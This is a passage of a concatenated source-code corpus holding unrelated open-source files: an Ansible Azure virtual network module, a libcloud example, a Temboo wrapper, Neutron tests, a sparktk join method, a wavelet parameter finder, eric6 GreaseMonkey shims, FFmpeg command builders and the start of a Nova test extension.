"Microsoft.Network/virtualNetworks" } ''' try: from msrestazure.azure_exceptions import CloudError from azure.mgmt.network.models import VirtualNetwork, AddressSpace, DhcpOptions except ImportError: # This is handled in azure_rm_common pass from ansible.module_utils.azure_rm_common import AzureRMModuleBase, CIDR_PATTERN def virtual_network_to_dict(vnet): ''' Convert a virtual network object to a dict. :param vnet: VirtualNet object :return: dict ''' results = dict( id=vnet.id, name=vnet.name, location=vnet.location, type=vnet.type, tags=vnet.tags, provisioning_state=vnet.provisioning_state, etag=vnet.etag ) if vnet.dhcp_options and len(vnet.dhcp_options.dns_servers) > 0: results['dns_servers'] = [] for server in vnet.dhcp_options.dns_servers: results['dns_servers'].append(server) if vnet.address_space and len(vnet.address_space.address_prefixes) > 0: results['address_prefixes'] = [] for space in vnet.address_space.address_prefixes: results['address_prefixes'].append(space) return results class AzureRMVirtualNetwork(AzureRMModuleBase): def __init__(self): self.module_arg_spec = dict( resource_group=dict(type='str', required=True), name=dict(type='str', required=True), state=dict(type='str', default='present', choices=['present', 'absent']), location=dict(type='str'), address_prefixes_cidr=dict(type='list', aliases=['address_prefixes']), dns_servers=dict(type='list',), purge_address_prefixes=dict(type='bool', default=False, aliases=['purge']), purge_dns_servers=dict(type='bool', default=False), ) mutually_exclusive = [ ('dns_servers', 'purge_dns_servers') ] required_if = [ ('purge_address_prefixes', True, ['address_prefixes_cidr']) ] self.resource_group = None self.name = None self.state = None self.location = None self.address_prefixes_cidr = None self.purge_address_prefixes = None self.dns_servers = None self.purge_dns_servers = None self.results=dict( changed=False, state=dict() ) super(AzureRMVirtualNetwork, self).__init__(self.module_arg_spec, mutually_exclusive=mutually_exclusive, required_if=required_if, supports_check_mode=True) def exec_module(self, **kwargs): for key in list(self.module_arg_spec.keys()) + ['tags']: setattr(self, key, kwargs[key]) self.results['check_mode'] = self.check_mode resource_group = self.get_resource_group(self.resource_group) if not self.location: # Set default location self.location = resource_group.location if self.state == 'present' and self.purge_address_prefixes: for prefix in self.address_prefixes_cidr: if not CIDR_PATTERN.match(prefix): self.fail("Parameter error: invalid address prefix value {0}".format(prefix)) if self.dns_servers and len(self.dns_servers) > 2: self.fail("Parameter error: You can provide a maximum of 2 DNS servers.") changed = False results = dict() try: self.log('Fetching vnet {0}'.format(self.name)) vnet = self.network_client.virtual_networks.get(self.resource_group, self.name) results = virtual_network_to_dict(vnet) self.log('Vnet exists {0}'.format(self.name)) self.log(results, pretty_print=True) self.check_provisioning_state(vnet, self.state) if self.state == 'present': if self.address_prefixes_cidr: existing_address_prefix_set = set(vnet.address_space.address_prefixes) requested_address_prefix_set = set(self.address_prefixes_cidr) missing_prefixes = requested_address_prefix_set - existing_address_prefix_set extra_prefixes = existing_address_prefix_set - requested_address_prefix_set if len(missing_prefixes) > 0: self.log('CHANGED: there are missing address_prefixes') changed = True if not self.purge_address_prefixes: # add the missing prefixes for prefix in missing_prefixes: results['address_prefixes'].append(prefix) if len(extra_prefixes) > 0 and self.purge_address_prefixes: self.log('CHANGED: there are address_prefixes to purge') changed = True # replace existing address prefixes with requested set results['address_prefixes'] = self.address_prefixes_cidr update_tags, results['tags'] = self.update_tags(results['tags']) if update_tags: changed = True if self.dns_servers: existing_dns_set = set(vnet.dhcp_options.dns_servers) requested_dns_set = set(self.dns_servers) if existing_dns_set != requested_dns_set: self.log('CHANGED: replacing DNS servers') changed = True results['dns_servers'] = self.dns_servers if self.purge_dns_servers and vnet.dhcp_options and len(vnet.dhcp_options.dns_servers) > 0: self.log('CHANGED: purging existing DNS servers') changed = True results['dns_servers'] = [] elif self.state == 'absent': self.log("CHANGED: vnet exists but requested state is 'absent'") changed = True except CloudError: self.log('Vnet {0} does not exist'.format(self.name)) if self.state == 'present': self.log("CHANGED: vnet {0} does not exist but requested state is 'present'".format(self.name)) changed = True self.results['changed'] = changed self.results['state'] = results if self.check_mode: return self.results if changed: if self.state == 'present': if not results: # create a new virtual network self.log("Create virtual network {0}".format(self.name)) if not self.address_prefixes_cidr: self.fail('Parameter error: address_prefixes_cidr required when creating a virtual network') vnet = VirtualNetwork( location=self.location, address_space=AddressSpace( address_prefixes=self.address_prefixes_cidr ) ) if self.dns_servers: vnet.dhcp_options = DhcpOptions( dns_servers=self.dns_servers ) if self.tags: vnet.tags = self.tags self.results['state'] = self.create_or_update_vnet(vnet) else: # update existing virtual network self.log("Update virtual network {0}".format(self.name)) vnet = VirtualNetwork( location=results['location'], address_space=AddressSpace( address_prefixes=results['address_prefixes'] ), tags=results['tags'] ) if results.get('dns_servers'): vnet.dhcp_options = DhcpOptions( dns_servers=results['dns_servers'] ) self.results['state'] = self.create_or_update_vnet(vnet) elif self.state == 'absent': self.delete_virtual_network() self.results['state']['status'] = 'Deleted' return self.results def create_or_update_vnet(self, vnet): try: poller = self.network_client.virtual_networks.create_or_update(self.resource_group, self.name, vnet) new_vnet = self.get_poller_result(poller) except Exception as exc: self.fail("Error creating or updating virtual network {0} - {1}".format(self.name, str(exc))) return virtual_network_to_dict(new_vnet) def delete_virtual_network(self): try: poller = self.network_client.virtual_networks.delete(self.resource_group, self.name) result = self.get_poller_result(poller) except Exception as exc: self.fail("Error deleting virtual network {0} - {1}".format(self.name, str(exc))) return result def main(): AzureRMVirtualNetwork() if __name__ == '__main__': main()
gpl-3.0
kater169/libcloud
example_compute.py
53
1403
# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from libcloud.compute.types import Provider from libcloud.compute.providers import get_driver EC2 = get_driver(Provider.EC2) Rackspace = get_driver(Provider.RACKSPACE) drivers = [EC2('access key id', 'secret key', region='us-east-1'), Rackspace('username', 'api key', region='iad')] nodes = [driver.list_nodes() for driver in drivers] print(nodes) # [ <Node: provider=Amazon, status=RUNNING, name=bob, ip=1.2.3.4.5>, # <Node: provider=Rackspace, status=REBOOT, name=korine, ip=6.7.8.9.10>, ... ] # grab the node named "test" node = [n for n in nodes if n.name == 'test'][0] # reboot "test" node.reboot()
apache-2.0
willprice/arduino-sphere-project
scripts/example_direction_finder/temboo/Library/Labs/GetWeather/ByAddress.py
5
3288
# -*- coding: utf-8 -*- ############################################################################### # # ByAddress # Retrieves weather and UV index data for a given Geo point using the Yahoo Weather and EnviroFacts APIs. # # Python versions 2.6, 2.7, 3.x # # Copyright 2014, Temboo Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific # language governing permissions and limitations under the License. # # ############################################################################### from temboo.core.choreography import Choreography from temboo.core.choreography import InputSet from temboo.core.choreography import ResultSet from temboo.core.choreography import ChoreographyExecution import json class ByAddress(Choreography): def __init__(self, temboo_session): """ Create a new instance of the ByAddress Choreo. A TembooSession object, containing a valid set of Temboo credentials, must be supplied. """ super(ByAddress, self).__init__(temboo_session, '/Library/Labs/GetWeather/ByAddress') def new_input_set(self): return ByAddressInputSet() def _make_result_set(self, result, path): return ByAddressResultSet(result, path) def _make_execution(self, session, exec_id, path): return ByAddressChoreographyExecution(session, exec_id, path) class ByAddressInputSet(InputSet): """ An InputSet with methods appropriate for specifying the inputs to the ByAddress Choreo. The InputSet object is used to specify input parameters when executing this Choreo. """ def set_APICredentials(self, value): """ Set the value of the APICredentials input for this Choreo. ((optional, json) A JSON dictionary containing a Yahoo App ID. See Choreo documentation for formatting examples.) """ super(ByAddressInputSet, self)._set_input('APICredentials', value) def set_Address(self, value): """ Set the value of the Address input for this Choreo. ((required, string) The street address of the location to get weather for.) """ super(ByAddressInputSet, self)._set_input('Address', value) class ByAddressResultSet(ResultSet): """ A ResultSet with methods tailored to the values returned by the ByAddress Choreo. The ResultSet object is used to retrieve the results of a Choreo execution. """ def getJSONFromString(self, str): return json.loads(str) def get_Response(self): """ Retrieve the value for the "Response" output from this Choreo execution. ((json) Contains combined weather data from Yahoo Weather and EnviroFacts.) """ return self._output.get('Response', None) class ByAddressChoreographyExecution(ChoreographyExecution): def _make_result_set(self, response, path): return ByAddressResultSet(response, path)
gpl-2.0
apporc/neutron
neutron/tests/unit/api/rpc/handlers/test_dvr_rpc.py
34
2111
# Copyright (c) 2015 OpenStack Foundation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import mock from neutron.api.rpc.handlers import dvr_rpc from neutron.tests import base class DVRServerRpcApiTestCase(base.BaseTestCase): def setUp(self): self.client_p = mock.patch.object(dvr_rpc.n_rpc, "get_client") self.client = self.client_p.start() self.rpc = dvr_rpc.DVRServerRpcApi('fake_topic') self.mock_cctxt = self.rpc.client.prepare.return_value self.ctxt = mock.ANY super(DVRServerRpcApiTestCase, self).setUp() def test_get_dvr_mac_address_by_host(self): self.rpc.get_dvr_mac_address_by_host(self.ctxt, 'foo_host') self.mock_cctxt.call.assert_called_with( self.ctxt, 'get_dvr_mac_address_by_host', host='foo_host') def test_get_dvr_mac_address_list(self): self.rpc.get_dvr_mac_address_list(self.ctxt) self.mock_cctxt.call.assert_called_with( self.ctxt, 'get_dvr_mac_address_list') def test_get_ports_on_host_by_subnet(self): self.rpc.get_ports_on_host_by_subnet( self.ctxt, 'foo_host', 'foo_subnet') self.mock_cctxt.call.assert_called_with( self.ctxt, 'get_ports_on_host_by_subnet', host='foo_host', subnet='foo_subnet') def test_get_subnet_for_dvr(self): self.rpc.get_subnet_for_dvr( self.ctxt, 'foo_subnet', fixed_ips='foo_fixed_ips') self.mock_cctxt.call.assert_called_with( self.ctxt, 'get_subnet_for_dvr', subnet='foo_subnet', fixed_ips='foo_fixed_ips')
apache-2.0
rodorad/spark-tk
python/sparktk/frame/ops/join_outer.py
14
6672
# vim: set encoding=utf-8 # Copyright (c) 2016 Intel Corporation  # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # #       http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # def join_outer(self, right, left_on, right_on=None): """ join_outer performs outer join operation on one or two frames, creating a new frame. Parameters ---------- :param right: (Frame) Another frame to join with :param left_on: (List[str]) Names of the columns in the left frame used to match up the two frames. :param right_on: (Optional[List[str]]) Names of the columns in the right frame used to match up the two frames. Default is the same as the left frame. :returns: (Frame) A new frame with the results of the join Create a new frame from a SQL JOIN operation with another frame. The frame on the 'left' is the currently active frame. The frame on the 'right' is another frame. This method take column(s) in the left frame and matches its values with column(s) in the right frame. The 'outer' join provides a frame with data from both frames where the left and right frames did not have the same value in the matching column(s). Notes ----- When a column is named the same in both frames, it will result in two columns in the new frame. The column from the *left* frame (originally the current frame) will be copied and the column name will have the string "_L" added to it. The same thing will happen with the column from the *right* frame, except its name has the string "_R" appended. The order of columns after this method is called is not guaranteed. It is recommended that you rename the columns to meaningful terms prior to using the ``join`` method. Examples -------- <hide> >>> codes = tc.frame.create([[1], [3], [1], [0], [2], [1], [5], [3]], [('numbers', int)]) -etc- >>> colors = tc.frame.create([[1, 'red'], [2, 'yellow'], [3, 'green'], [4, 'blue']], [('numbers', int), ('color', str)]) -etc- >>> country_code_rows = [[1, 354, "a"],[2, 91, "a"],[2, 100, "b"],[3, 47, "a"],[4, 968, "c"],[5, 50, "c"]] >>> country_code_schema = [("country_code", int),("area_code", int),("test_str",str)] -etc- >>> country_name_rows = [[1, "Iceland", "a"],[1, "Ice-land", "a"],[2, "India", "b"],[3, "Norway", "a"],[4, "Oman", "c"],[6, "Germany", "c"]] >>> country_names_schema = [("country_code", int),("country_name", str),("test_str",str)] -etc- >>> country_codes_frame = tc.frame.create(country_code_rows, country_code_schema) -etc- >>> country_names_frame= tc.frame.create(country_name_rows, country_names_schema) -etc- </hide> Consider two frames: codes and colors >>> codes.inspect() [#] numbers ============ [0] 1 [1] 3 [2] 1 [3] 0 [4] 2 [5] 1 [6] 5 [7] 3 >>> colors.inspect() [#] numbers color ==================== [0] 1 red [1] 2 yellow [2] 3 green [3] 4 blue Join them on the 'numbers' column ('inner' join by default) >>> j_outer = codes.join_outer(colors, 'numbers') <progress> >>> j_outer.inspect() [#] numbers_L color ====================== [0] 0 None [1] 1 red [2] 1 red [3] 1 red [4] 2 yellow [5] 3 green [6] 3 green [7] 4 blue [8] 5 None (The join adds an extra column *_R which is the join column from the right frame; it may be disregarded) Consider two frames: country_codes_frame and country_names_frame >>> country_codes_frame.inspect() [#] country_code area_code test_str ====================================== [0] 1 354 a [1] 2 91 a [2] 2 100 b [3] 3 47 a [4] 4 968 c [5] 5 50 c >>> country_names_frame.inspect() [#] country_code country_name test_str ========================================= [0] 1 Iceland a [1] 1 Ice-land a [2] 2 India b [3] 3 Norway a [4] 4 Oman c [5] 6 Germany c Join them on the 'country_code' and 'test_str' columns ('inner' join by default) >>> composite_join_outer = country_codes_frame.join_outer(country_names_frame, ['country_code', 'test_str']) <progress> >>> composite_join_outer.inspect() [#] country_code_L area_code test_str_L country_name ======================================================== [0] 6 None c Germany [1] 1 354 a Iceland [2] 1 354 a Ice-land [3] 2 91 a None [4] 2 100 b India [5] 3 47 a Norway [6] 4 968 c Oman [7] 5 50 c None """ if left_on is None: raise ValueError("Please provide column name on which join should be performed") elif isinstance(left_on, basestring): left_on = [left_on] if right_on is None: right_on = left_on elif isinstance(right_on, basestring): right_on = [right_on] if len(left_on) != len(right_on): raise ValueError("Please provide equal number of join columns") from sparktk.frame.frame import Frame return Frame(self._tc, self._scala.joinOuter(right._scala, self._tc.jutils.convert.to_scala_list_string(left_on), self._tc.jutils.convert.to_scala_option( self._tc.jutils.convert.to_scala_list_string(right_on))))
apache-2.0
numenta-archive/htmresearch
htmresearch/frameworks/utils/param_finder.py
9
12312
# ---------------------------------------------------------------------- # Numenta Platform for Intelligent Computing (NuPIC) # Copyright (C) 2015, Numenta, Inc. Unless you have an agreement # with Numenta, Inc., for a separate license for this software code, the # following terms and conditions apply: # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Affero Public License for more details. # # You should have received a copy of the GNU Affero Public License # along with this program. If not, see http://www.gnu.org/licenses. # # http://numenta.org/licenses/ # ---------------------------------------------------------------------- """ Automatically find data aggregation window and suggest whether to use TimeOfDay and DayOfWeek encoder. Example usage: (timestamps, values) = read_csv_files('example_data/art_daily_flatmiddle.csv') (med_sampling_interval, new_sampling_interval, useTimeOfDay, useDayOfWeek) = get_suggested_timescale_and_encoder(timestamps, values) """ import csv import numpy as np _mode_from_name_dict = { 'v': 0, 's': 1, 'f': 2 } def _convolve(a, v, mode='full'): """ Returns the discrete, linear convolution of two one-dimensional sequences. The convolution operator is often seen in signal processing, where it models the effect of a linear time-invariant system on a signal [1]_. In probability theory, the sum of two independent random variables is distributed according to the convolution of their individual distributions. If `v` is longer than `a`, the arrays are swapped before computation. Parameters ---------- a : (N,) array_like First one-dimensional input array. v : (M,) array_like Second one-dimensional input array. mode : {'full', 'valid', 'same'}, optional 'full': By default, mode is 'full'. This returns the convolution at each point of overlap, with an output shape of (N+M-1,). At the end-points of the convolution, the signals do not overlap completely, and boundary effects may be seen. 'same': Mode `same` returns output of length ``max(M, N)``. Boundary effects are still visible. 'valid': Mode `valid` returns output of length ``max(M, N) - min(M, N) + 1``. The convolution product is only given for points where the signals overlap completely. Values outside the signal boundary have no effect. Returns ------- out : ndarray Discrete, linear convolution of `a` and `v`. References ---------- .. [1] Wikipedia, "Convolution", http://en.wikipedia.org/wiki/Convolution. """ a, v = np.array(a, ndmin=1), np.array(v, ndmin=1) if len(v) > len(a): a, v = v, a if len(a) == 0: raise ValueError('a cannot be empty') if len(v) == 0: raise ValueError('v cannot be empty') mode = _mode_from_name(mode) return np.core.multiarray.correlate(a, v[::-1], mode) def _mode_from_name(mode): if isinstance(mode, basestring): return _mode_from_name_dict[mode.lower()[0]] return mode def _ricker_wavelet(points, a): """ Return a Ricker wavelet, also known as the "Mexican hat wavelet". It models the function: ``A (1 - x^2/a^2) exp(-t^2/a^2)``, where ``A = 2/sqrt(3a)pi^1/3``. Parameters ---------- points : int Number of points in `vector`. Will be centered around 0. a : scalar Width parameter of the wavelet. Returns ------- vector : (N,) ndarray Array of length `points` in shape of ricker curve. """ A = 2 / (np.sqrt(3 * a) * (np.pi ** 0.25)) wsq = a ** 2 vec = np.arange(0, points) - (points - 1.0) / 2 tsq = vec ** 2 mod = (1 - tsq / wsq) gauss = np.exp(-tsq / (2 * wsq)) total = A * mod * gauss return total def _cwt(data, wavelet, widths): """ Continuous wavelet transform. Performs a continuous wavelet transform on `data`, using the `wavelet` function. A CWT performs a convolution with `data` using the `wavelet` function, which is characterized by a width parameter and length parameter. Parameters ---------- data : (N,) ndarray data on which to perform the transform. wavelet : function Wavelet function, which should take 2 arguments. The first argument is the number of points that the returned vector will have (len(wavelet(width,length)) == length). The second is a width parameter, defining the size of the wavelet (e.g. standard deviation of a gaussian). See `ricker`, which satisfies these requirements. widths : (M,) sequence Widths to use for transform. Returns ------- cwt: (M, N) ndarray Will have shape of (len(data), len(widths)). """ output = np.zeros([len(widths), len(data)]) for ind, width in enumerate(widths): wavelet_data = wavelet(min(10 * width, len(data)), width) output[ind, :] = _convolve(data, wavelet_data, mode='same') return output def read_csv_files(fileName): """ Read csv data file, the data file must have two columns with header "timestamp", and "value" """ fileReader = csv.reader(open(fileName, 'r')) fileReader.next() # skip header line timestamps = [] values = [] for row in fileReader: timestamps.append(row[0]) values.append(row[1]) timestamps = np.array(timestamps, dtype='datetime64') values = np.array(values, dtype='float32') return timestamps, values def resample_data(timestamp, sig, new_sampling_interval): """ Resample time series data at new sampling interval using linear interpolation. Note: the resampling function is using interpolation, it may not be appropriate for aggregation purpose :param timestamp: timestamp in numpy datetime64 type :param sig: value of the time series. :param new_sampling_interval: new sampling interval. """ nSampleNew = np.floor((timestamp[-1] - timestamp[0]) / new_sampling_interval).astype('int') + 1 timestamp_new = np.empty(nSampleNew, dtype='datetime64[s]') for sampleI in xrange(nSampleNew): timestamp_new[sampleI] = timestamp[0] + sampleI * new_sampling_interval sig_new = np.interp((timestamp_new - timestamp[0]).astype('float32'), (timestamp - timestamp[0]).astype('float32'), sig) return timestamp_new, sig_new def calculate_cwt(sampling_interval, value): """ Calculate continuous wavelet transformation (CWT) Return variance of the cwt coefficients overtime and its cumulative distribution :param sampling_interval: sampling interval of the time series :param value: value of the time series """ #t = np.array(range(len(value))) * sampling_interval widths = np.logspace(0, np.log10(len(value) / 20), 50) T = int(widths[-1]) # continuous wavelet transformation with ricker wavelet cwtmatr = _cwt(value, _ricker_wavelet, widths) cwtmatr = cwtmatr[:, 4 * T:-4 * T] #value = value[4 * T:-4 * T] #t = t[4 * T:-4 * T] #freq = 1 / widths.astype('float') / sampling_interval / 4 time_scale = widths * sampling_interval * 4 # variance of wavelet power cwt_var = np.var(np.abs(cwtmatr), axis=1) cwt_var = cwt_var / np.sum(cwt_var) return cwtmatr, cwt_var, time_scale def get_local_maxima(cwt_var, time_scale): """ Find local maxima from the wavelet coefficient variance spectrum A strong maxima is defined as (1) At least 10% higher than the nearest local minima (2) Above the baseline value The algorithm will suggest an encoder if its corresponding periodicity is close to a strong maxima: (1) horizontally must within the nearest local minimum (2) vertically must within 50% of the peak of the strong maxima """ # peak & valley detection local_min = (np.diff(np.sign(np.diff(cwt_var))) > 0).nonzero()[0] + 1 local_max = (np.diff(np.sign(np.diff(cwt_var))) < 0).nonzero()[0] + 1 baseline_value = 1.0 / len(cwt_var) dayPeriod = 86400.0 weekPeriod = 604800.0 cwt_var_at_dayPeriod = np.interp(dayPeriod, time_scale, cwt_var) cwt_var_at_weekPeriod = np.interp(weekPeriod, time_scale, cwt_var) useTimeOfDay = False useDayOfWeek = False strong_local_max = [] for i in xrange(len(local_max)): left_local_min = np.where(np.less(local_min, local_max[i]))[0] if len(left_local_min) == 0: left_local_min = 0 left_local_min_value = cwt_var[0] else: left_local_min = local_min[left_local_min[-1]] left_local_min_value = cwt_var[left_local_min] right_local_min = np.where(np.greater(local_min, local_max[i]))[0] if len(right_local_min) == 0: right_local_min = len(cwt_var) - 1 right_local_min_value = cwt_var[-1] else: right_local_min = local_min[right_local_min[0]] right_local_min_value = cwt_var[right_local_min] local_max_value = cwt_var[local_max[i]] nearest_local_min_value = np.max(left_local_min_value, right_local_min_value) if ((local_max_value - nearest_local_min_value) / nearest_local_min_value > 0.1 and local_max_value > baseline_value): strong_local_max.append(local_max[i]) if (time_scale[left_local_min] < dayPeriod < time_scale[right_local_min] and cwt_var_at_dayPeriod > local_max_value * 0.5): useTimeOfDay = True if (time_scale[left_local_min] < weekPeriod < time_scale[right_local_min] and cwt_var_at_weekPeriod > local_max_value * 0.5): useDayOfWeek = True return useTimeOfDay, useDayOfWeek, local_min, local_max, strong_local_max def determine_aggregation_window(time_scale, cum_cwt_var, thresh, dt_sec, data_length): cutoff_time_scale = time_scale[np.where(cum_cwt_var >= thresh)[0][0]] aggregation_time_scale = cutoff_time_scale / 10.0 if aggregation_time_scale < dt_sec * 4: aggregation_time_scale = dt_sec * 4 if data_length < 1000: aggregation_time_scale = dt_sec else: # make sure there is > 1000 records after aggregation dt_max = float(data_length) / 1000.0 * dt_sec if aggregation_time_scale > dt_max > dt_sec: aggregation_time_scale = dt_max return aggregation_time_scale def get_suggested_timescale_and_encoder(timestamp, value, thresh=0.2): """ Recommend aggregation timescales and encoder types for time series data :param timestamp: sampling times of the time series :param value: value of the time series :param thresh: aggregation threshold (default value based on experiments with NAB data) :return med_sampling_interval: median sampling interval in seconds :return: new_sampling_interval, a string for suggested sampling interval (e.g., 300000ms) :return: useTimeOfDay, a bool variable for whether to use time of day encoder :return: useDayOfWeek, a bool variable for whether to use day of week encoder """ # The data may have inhomogeneous sampling rate, here we take the median # of the sampling intervals and resample the data with the same sampling # intervals dt = np.median(np.diff(timestamp)) med_sampling_interval = dt.astype('float32') (timestamp, value) = resample_data(timestamp, value, dt) (cwtmatr, cwt_var, time_scale) = calculate_cwt(med_sampling_interval, value) cum_cwt_var = np.cumsum(cwt_var) # decide aggregation window new_sampling_interval = determine_aggregation_window(time_scale, cum_cwt_var, thresh, med_sampling_interval, len(value)) new_sampling_interval = str(int(new_sampling_interval * 1000)) + 'ms' # decide whether to use TimeOfDay and DayOfWeek encoders (useTimeOfDay, useDayOfWeek, local_min, local_max, strong_local_max) = get_local_maxima(cwt_var, time_scale) return (med_sampling_interval, new_sampling_interval, useTimeOfDay, useDayOfWeek)
agpl-3.0
paulmadore/Eric-IDE
6-6.0.9/eric/Helpviewer/GreaseMonkey/GreaseMonkeyJavaScript.py
2
3586
# -*- coding: utf-8 -*- # Copyright (c) 2012 - 2015 Detlev Offenbach <detlev@die-offenbachs.de> # """ Module containing some JavaScript resources. """ from __future__ import unicode_literals bootstrap_js = """ if(typeof GM_xmlhttpRequest === "undefined") { GM_xmlhttpRequest = function(/* object */ details) { details.method = details.method.toUpperCase() || "GET"; if(!details.url) { throw("GM_xmlhttpRequest requires an URL."); } // build XMLHttpRequest object var oXhr = new XMLHttpRequest; // run it if(oXhr) { if("onreadystatechange" in details) oXhr.onreadystatechange = function() { details.onreadystatechange(oXhr) }; if("onload" in details) oXhr.onload = function() { details.onload(oXhr) }; if("onerror" in details) oXhr.onerror = function() { details.onerror(oXhr) }; oXhr.open(details.method, details.url, true); if("headers" in details) for(var header in details.headers) oXhr.setRequestHeader(header, details.headers[header]); if("data" in details) oXhr.send(details.data); else oXhr.send(); } else throw ("This Browser is not supported, please upgrade.") } } if(typeof GM_addStyle === "undefined") { function GM_addStyle(/* String */ styles) { var head = document.getElementsByTagName("head")[0]; if (head === undefined) { document.onreadystatechange = function() { if (document.readyState == "interactive") { var oStyle = document.createElement("style"); oStyle.setAttribute("type", "text\/css"); oStyle.appendChild(document.createTextNode(styles)); document.getElementsByTagName("head")[0].appendChild(oStyle); } } } else { var oStyle = document.createElement("style"); oStyle.setAttribute("type", "text\/css"); oStyle.appendChild(document.createTextNode(styles)); head.appendChild(oStyle); } } } if(typeof GM_log === "undefined") { function GM_log(log) { if(console) console.log(log); } } if(typeof GM_openInTab === "undefined") { function GM_openInTab(url) { window.open(url) } } // Define unsafe window var unsafeWindow = window; window.wrappedJSObject = unsafeWindow; // GM_registerMenuCommand not supported if(typeof GM_registerMenuCommand === "undefined") { function GM_registerMenuCommand(caption, commandFunc, accessKey) { } } // GM Resource not supported if(typeof GM_getResourceText === "undefined") { function GM_getResourceText(resourceName) { throw ("eric6 Web Browser: GM Resource is not supported!"); } } if(typeof GM_getResourceURL === "undefined") { function GM_getResourceURL(resourceName) { throw ("eric6 Web Browser: GM Resource is not supported!"); } } // GM Settings not supported if(typeof GM_getValue === "undefined") { function GM_getValue(name, defaultValue) { return defaultValue; } } if(typeof GM_setValue === "undefined") { function GM_setValue(name, value) { } } if(typeof GM_deleteValue === "undefined") { function GM_deleteValue(name) { } } if(typeof GM_listValues === "undefined") { function GM_listValues() { return new Array(""); } } """
gpl-3.0
terabit-software/dynamic-stream-server
dss/tools/ffmpeg.py
2
3206
from __future__ import absolute_import import shlex from ..config import config bin_default = config.get('ffmpeg', 'bin') probe = config.get('ffmpeg', 'probe') def _input_cmd(cmd_input, input, add_probe=True, bin=None, add_bin=True): """ Base of FFmpeg command with a single input. """ if add_bin: args = [bin_default if bin is None else bin] else: args = [] if cmd_input is None: raise ValueError('Passing `None` on `cmd_input` will cause ' 'shlex.split to hang instead of raising error.') args += shlex.split(cmd_input) if add_probe: args += ['-probesize', probe] args += ['-i', input] return args def cmd(cmd_input, input, cmd_output, output, add_probe=True, bin=None): """ Build FFmpeg command for a single input and single output. """ args = _input_cmd(cmd_input, input, add_probe, bin) args += shlex.split(cmd_output) args.append(output) return args def cmd_inputs(cmd_input, inputs, cmd_output, output, add_probe=True, bin=None): """ Build FFmpeg command for multiple input files and a single output. If an item on the `input` list is a 2-item tuple, it will be unpacked into input command for this input and the input. E.g.: ['audio_file.mp4', ('-f mpegts', 'video_stream')] """ args = [] cmd_input_ = cmd_input for ix, inp in enumerate(inputs): if cmd_input is None: cmd_input_, inp = inp if isinstance(inp, tuple): cmd_input_ += ' ' + inp[0] inp = inp[1] args += _input_cmd(cmd_input_, inp, add_probe, bin, add_bin=not ix) cmd_input_ = cmd_input args += shlex.split(cmd_output) args.append(output) return args def cmd_outputs(cmd_input, input, base_cmd_output, cmd_output_specific, outputs, add_probe=True, bin=None): """ Build FFmpeg command for multiple outputs but single input. """ args = _input_cmd(cmd_input, input, add_probe, bin) base_cmd_output = shlex.split(base_cmd_output) for out_cmd, out in zip(cmd_output_specific, outputs): args += base_cmd_output args += shlex.split(out_cmd) args.append(out) return args def cmd_inputs_outputs(cmd_input, inputs, base_cmd_output, cmd_output_specific, outputs, add_probe=True, bin=None): """ Build FFmpeg command for multiple input files and a multiple outputs. If an item on the `input` list is a 2-item tuple, it will be unpacked into input command for this input and the input. E.g.: ['audio_file.mp4', ('-f mpegts', 'video_stream')] """ args = [] cmd_input_ = cmd_input for ix, inp in enumerate(inputs): if cmd_input is None: cmd_input_, inp = inp if isinstance(inp, tuple): cmd_input_ += ' ' + inp[0] inp = inp[1] args += _input_cmd(cmd_input_, inp, add_probe, bin, add_bin=not ix) cmd_input_ = cmd_input base_cmd_output = shlex.split(base_cmd_output) for out_cmd, out in zip(cmd_output_specific, outputs): args += base_cmd_output args += shlex.split(out_cmd) args.append(out) return args
bsd-3-clause
psiwczak/openstack
nova/tests/api/openstack/compute/extensions/foxinsocks.py
33
2984
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2011 OpenStack LLC. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import webob.exc from nova.api.openstack import extensions from nova.api.openstack import wsgi class FoxInSocksController(object): def index(self, req): return "Try to say this Mr. Knox, sir..." class FoxInSocksServerControllerExtension(wsgi.Controller): @wsgi.action('add_tweedle') def _add_tweedle(self, req, id, body): return "Tweedle Beetle Added." @wsgi.action('delete_tweedle') def _delete_tweedle(self, req, id, body): return "Tweedle Beetle Deleted." @wsgi.action('fail') def _fail(self, req, id, body): raise webob.exc.HTTPBadRequest(explanation='Tweedle fail') class FoxInSocksFlavorGooseControllerExtension(wsgi.Controller): @wsgi.extends def show(self, req, resp_obj, id): 